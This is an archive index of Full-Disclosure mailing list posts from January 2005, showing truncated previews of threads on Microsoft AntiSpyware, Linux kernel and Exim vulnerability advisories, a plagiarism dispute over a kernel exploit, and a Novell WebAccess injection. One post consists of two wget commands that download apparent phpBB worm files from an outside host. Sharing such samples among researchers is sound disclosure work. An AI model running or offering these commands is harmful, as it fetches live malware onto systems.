[Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread James Patterson Wicks
We knew that Microsoft was going to put out an anti-spyware product after they bought Giant in December, but I did not figure they could re-brand Giant’s software in under a month.  Their first shot at anti-spyware came out today – Microsoft AntiSpyware (Beta).  I installed it on a test m

RE: [Full-Disclosure] hackers hacking hackers wtf?

2005-01-07 Thread Brad Griffin
Perhaps the 'hacker hackers' should learn correct grammar and spelling before attempting to ridicule others... -Original Message- Subject: RE: [Full-Disclosure] hackers hacking hackers wtf? The website is down But you can still see the hacked page at Google cache... http://www.goog

RE: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB

2005-01-07 Thread ALD, Aditya, Aditya Lalit Deshmukh
>Subject: [Full-Disclosure] WinHKI - ARC File Extraction of 1KB to 1.56GB These attacks have been possible in almost all kinds of compressed file formats and have been known for years - I think it is known as zip bombing. This is not limited to this particular tool or format.

RE: [Full-Disclosure] Trivial Bug in Symantec Security Products

2005-01-07 Thread Brad Griffin
-Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Gregh Sent: Tuesday, January 04, 2005 6:33 AM To: Disclosure Full Subject: Re: [Full-Disclosure] Trivial Bug in Symantec Security Products > > Somehow, Symantec engineers have not implemented a mechanis

Re: [Full-Disclosure] Any study on patch availability?

2005-01-07 Thread dila
http://secunia.com/advisory_statistics/ ever heard of google? On Sun, 26 Dec 2004 12:26:17 -0500 (EST), [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > > Hi all, > > Holiday season greetings. > > I am a PhD student at Princeton studying security. I am interested in > studying vulnerability sta

RE: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread irfan . syed
Yeah I tried it too, and the only thing it found on my PC was VNC server. I was, however, impressed that the tool explained very well what the program was for and how it could be used for spying. Definitely worth a try. PS: VNC on my machine is not accessible from outside

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread Paul Laudanski
On Thu, 6 Jan 2005, James Patterson Wicks wrote: > While this was just a quick test to satisfy my curiosity about the > Microsoft tool, my initial feeling is that the Microsoft AntiSpyware is > worth a test deployment in the office. This beta expires in July. > Hopefully the final version will be

[Full-Disclosure] Advisory 1/2005 - Linux Kernel arbitrary code execution vulnerability.

2005-01-07 Thread Stefan Esser
/* A New Initiative for a New Year * * E-matters are pleased to announce their new Microsoft-approved * Responsible Disclosure initiative in which we will be working * very closely with eEye, iDefense and the vendersec mailing list: * "e-eyeDefenderSec - Because the 'e'-matters" *

[Full-Disclosure] [USN-56-1] exim4 vulnerabilities

2005-01-07 Thread Martin Pitt
=== Ubuntu Security Notice USN-56-1 January 07, 2005 exim4 vulnerabilities CAN-2005-0021, CAN-2005-0022 === A security issue affects the following Ubuntu releases: Ubuntu 4.1

[Full-Disclosure] Simple PHP Blog directory traversal vulnerability

2005-01-07 Thread Madelman
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Title: Simple PHP Blog directory traversal vulnerability Vulnerability discovery: Madelman Date: 02/01/2005 Severity: Moderate Summary: - I started this project because I wanted a dead-simple blog. Something that didn't require a database, use

[Full-Disclosure] Linux kernel sys_uselib local root vulnerability

2005-01-07 Thread Paul Starzetz
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi all, first of all I must comply about the handling of this vulnerability that I reported to vendorsec. Obviously my code posted there has been stolen and plagiated by Stefan Esser from Ematters. The posting containing the plagiate will follow. Now

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread KF (lists)
Do a software update check with this thing and you get GIANTAntiSpywareMain.exe listening on port 2571 until the software is closed. Feel free to beat on and fuzz that port fellas. =] -KF KF (lists) wrote: I love how the icon for this product is a big Target. Very appropriate. Anyone wanna tak

Re: [Full-Disclosure] This sums up Yahoo!s securitypolicyto a -T-

2005-01-07 Thread Daniel Fischer
Greetings fellow mortals, All of you need a break. Clearly, nobody's able to recognise satire nor parody anymore. First the rm vulnerability discussion, now this... On Tuesday 04 January 2005 15:48, Clairmont, Jan M wrote: > I love it when self-proclaimed luzer's claim to own anything. What d

[Full-Disclosure] [iSEC] [Dailydave] Advisory 1/2005 - Linux Kernel arbitrary code execution (fwd)

2005-01-07 Thread Paul Starzetz
here the plagiate. -- Paul Starzetz iSEC Security Research http://isec.pl/ -- Forwarded message -- Date: Fri, 7 Jan 2005 09:39:18 +0100 (CET) From: Janusz Niewiadomski <[EMAIL PROTECTED]> Reply-To: [EMAIL PROTECTED] To: [EMAIL PROTECTED] Subject: [iSEC] [Dailydave] Advisory 1/2

[Full-Disclosure] Undocumented sun classes

2005-01-07 Thread Thierry Haven
Hi list; Sun's website states that the sun.* packages are not part of the supported, public interface... (http://java.sun.com/products/jdk/faq/faq-sun-packages.html)... However, i'm looking for security related information about those "undocumented" sun.* classes. Does anyone have an idea ? Th

[Full-Disclosure] ndisasm bad opcodes interpretation

2005-01-07 Thread shadown
Hi, not a vulnerability but could be a headache while reverse engineering or binary auditing/interpreting, etc. (ok anything related with disassembling) get wrong values. [EMAIL PROTECTED]:/tmp$ ndisasm -b32 salida 49 dec ecx 0001 6E outsb 0002 7465 jz 0x69 0004 6C insb 0

[Full-Disclosure] Linux kernel uselib() privilege elevation, corrected

2005-01-07 Thread Paul Starzetz
Hi all, first of all I must comply about the handling of this vulnerability that I reported to vendorsec. Obviously my code posted there has been stolen and plagiated in order to put the blame on Stefan Esser from Ematters and disturb the security community. I really apologize to Stefan Esser

[Full-Disclosure] Novell WebAcces

2005-01-07 Thread noAcces
I was playing around when I found a small problem with Novell's WebAcces. With User.lang you can give in your language as parameter. I tried some different stuff there and when I tried "> so that the URL would be hxxp://www.notsohappyserver.com/servlet/webacc?User.Lang="> a link appeared. I click

Re: [Full-Disclosure] Possible DNS compromise/poisoning?

2005-01-07 Thread Ben McGinnes
[EMAIL PROTECTED]([EMAIL PROTECTED])@Wed, Jan 05, 2005 at 06:45:08AM -0800: > > Notice that www.microsoft.com is a cname for > www.microsoft.com.nsatc.net. It's not limited to www.microsoft.com > and to the best of my knowledge the correct web content is > displayed. Microsoft used to have their

Re: [Full-Disclosure] Yahoo security and privacy

2005-01-07 Thread n3td3v
On Tue, 04 Jan 2005 14:18:49 +0200, Alex V. Lukyanenko <[EMAIL PROTECTED]> wrote: > > Quoting n3td3v, > > Because we all know Yahoo! has no account security, so kids aged 15 > > can hack an account. Yahoo! is like hacking for beginners. Its easy to > > do, and therefore a great network to learn sk

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread KF (lists)
I love how the icon for this product is a big Target. Very appropriate. Anyone wanna take bets on how long it takes for someone to find a hole in the Spynet p2p functions of this beast, what port is that listening on again? *grin* -KF James Patterson Wicks wrote: We knew that Microsoft was goi

Re: [Full-Disclosure] Novell WebAcces

2005-01-07 Thread DanBUK
Hi, > It seems that this is working on almost every webacces server Just did a quick google and tried that on a couple of sites but no link appeared. Does this require authentication?? Cheers, DanB UK. DanB UK London, UK. ___ Full-Disclosure - We beli

[Full-Disclosure] Press Release Survivor Location Assistance Project

2005-01-07 Thread synackrst
FOR IMMEDIATE RELEASE CONTACT: North America: B.K. DeLong Media Liaison The Hacker Foundation telephone: +1.617.797.2472 Christian Wright Media Liaison Packetstorm Security telephone: +1.312.399.5064 Europe: Emerson Tan Director Packetstorm Security telephone: +44.781.456.8265 e-mail: [EMAIL PROTEC

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread Kyle Maxwell
On Fri, 7 Jan 2005 17:57:55 +0800, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > > Yeah I tried it too, and the only thing it found on my PC was VNC server. I > was, however, impressed that the tool explained very well what the program > was for and how it could be used for spying. It picked u

[Full-Disclosure] [grsec] grsecurity 2.1.0 release / 5 Linux kernel advisories

2005-01-07 Thread Brad Spengler
grsecurity 2.1.0 release / Linux Kernel advisories Table Of Contents: 1) grsecurity 2.1.0 announcement and changelog 2) Linux Kernel advisory introduction 3) 2.4/2.6 random poolsize sysctl handler integer overflow 4) 2.6 scsi ioc

[Full-Disclosure] grsecurity 2.1.0 release / 5 Linux kernel advisories

2005-01-07 Thread Brad Spengler
Let's try this again, since web archives don't like multipart attachments. grsecurity 2.1.0 release / Linux Kernel advisories Table Of Contents: 1) grsecurity 2.1.0 announcement and changelog 2) Linux Kernel advisory introducti

RE: [Full-Disclosure] Novell WebAcces

2005-01-07 Thread Horseman, Michael W.
I think maybe you’re seeing the directory traversal vulnerability identified in Groupwise.  Groupwise 6 had this vulnerability as well as previous versions if I remember right. http://xforce.iss.net/xforce/xfdb/7287   Thanks, Michael Horseman IT Security Analyst Capgemini [EMAIL PR

[Full-Disclosure] Re: ndisasm bad opcodes interpretation

2005-01-07 Thread Dave Korn
"shadown" <[EMAIL PROTECTED]> wrote in message news:[EMAIL PROTECTED] > > i.e: > 001C 7565 jnz 0x83 > sould had been jnz 0x65 No it shouldn't. Engage brain before opening mouth: what is 0x65 + 0x1e (== address of byte immediately after the instruction in question)? Google "pc-relative br

[Full-Disclosure] Re: grsecurity 2.1.0 release / 5 Linux kernel advisories

2005-01-07 Thread Greg Ahmad
looks good. On Fri, 7 Jan 2005, Brad Spengler wrote: > Let's try this again, since web archives don't like multipart > attachments. > > grsecurity 2.1.0 release / Linux Kernel advisories > > > Table Of Contents: > 1) grsecurity

Re: [Full-Disclosure] RE: Full-Disclosure Digest, Vol 1, Issue 2144

2005-01-07 Thread GuidoZ
Try here instead: - http://lists.netsys.com/mailman/listinfo/full-disclosure Goes for anyone who wishes to be removed. ;) Save this email for future reference. On Thu, 30 Dec 2004 15:34:13 -, [EMAIL PROTECTED] <[EMAIL PROTECTED]> wrote: > Please unsubscribe me from this list > [BIG SNIP]

[Full-Disclosure] Re: ndisasm bad opcodes interpretation

2005-01-07 Thread shadown
my mistake... short jump: it's JMP_Address + 2 + Second_Byte_value = Next_Instruction_Address [EMAIL PROTECTED]:~/tmp$ echo -n -e "\x75\x65" > a [EMAIL PROTECTED]:~/tmp$ ndisasm -b32 a 7565 jnz 0x67 [EMAIL PROTECTED]:~/tmp$ ~/instalar/libdisassemble/disassemble.py a 0x0 0xf

Re: [Full-Disclosure] Microsoft AntiSpyware - First Impressions

2005-01-07 Thread Valdis . Kletnieks
On Fri, 07 Jan 2005 12:52:58 CST, Kyle Maxwell said: > It may not be perfect (I thought the Spyware Community was essentially > sending back to a central site, didn't realize it was P2P, this > requires a closer look) but at a minimum it's nice to see MS giving > this some attention. Fix the IE ho

[Full-Disclosure] One more phpBB worm

2005-01-07 Thread Willem Koenings
wget -vv atlasol.com/.zk/sess_189f0f0889555397a4de5485dd61 wget -vv atlasol.com/.zk/sess_189f0f0889555397a4de5485dd62 all the best, W ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html

Re: [Full-Disclosure] RE: Full-Disclosure Digest, Vol 1, Issue 2144

2005-01-07 Thread Valdis . Kletnieks
On Fri, 07 Jan 2005 13:07:52 PST, GuidoZ said: > Try here instead: > - http://lists.netsys.com/mailman/listinfo/full-disclosure > > Goes for anyone who wishes to be removed. ;) Save this email for > future reference. Or look at the e-mail headers for *every message*: List-post:

[Full-Disclosure] iDEFENSE Security Advisory [IDEF0731] Exim auth_spa_server() Buffer Overflow Vulnerability

2005-01-07 Thread idlabs-advisories
Exim auth_spa_server() Buffer Overflow Vulnerability iDEFENSE Security Advisory [IDEF0731] www.idefense.com/application/poi/display?id=178&type=vulnerabilities January 07, 2004 I. BACKGROUND Exim is a message transfer agent developed for use on Unix systems. More information is available at:

[Full-Disclosure] iDEFENSE Security Advisory [IDEF0725] Exim host_aton() Buffer Overflow Vulnerability

2005-01-07 Thread idlabs-advisories
Exim host_aton() Buffer Overflow Vulnerability iDEFENSE Security Advisory [IDEF0725] http://www.idefense.com/application/poi/display?type=vulnerabilities January 07, 2005 I. BACKGROUND Exim is a message transfer agent developed for use on Unix systems. More information is available at:

[Full-Disclosure] Kindergarten on vacation (was: Obvious fake mail...)

2005-01-07 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Hi again, it is quite funny how Immunitysec is supporting the kids that first stole Paul's linux local root exploit and then sent it out to the whole world in my name. Otherwise it is hard to explain why dailydave again and again lets those obviously

[Full-Disclosure] Firefox long URL field obfuscation vulnerability?

2005-01-07 Thread Kristian Hermansen
This is a quick heads up for people who want to investigate it further. At least on my Ubuntu system (warty), a URL with a significant amount of data seems to "obfuscate" the URL field and not allow the end user to properly identify the site to which they are connecting. This could be another pote

[Full-Disclosure] Outsch... Sorry...

2005-01-07 Thread Stefan Esser
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Outsch! My mail was so fast through that I do not believe anymore that it is moderated at the moment :) So sorry to Dave. Stays the question why pipermail is too dumb to generate correct archives ;) Stefan -BEGIN PGP SIGNATURE- Version: GnuP

Backdoors and source code (was Re: [Full-Disclosure] Multiple Backdoors found...)

2005-01-07 Thread Kevin
On Sun, 02 Jan 2005 20:27:09 -0800, Blue Boar <[EMAIL PROTECTED]> wrote: > Dave Aitel wrote: > > Of course, this sort of thing is basically impossible to disprove - > > especially without source. > > If I were looking for a well-hidden backdoor, I wouldn't bother with > source. There's no guarant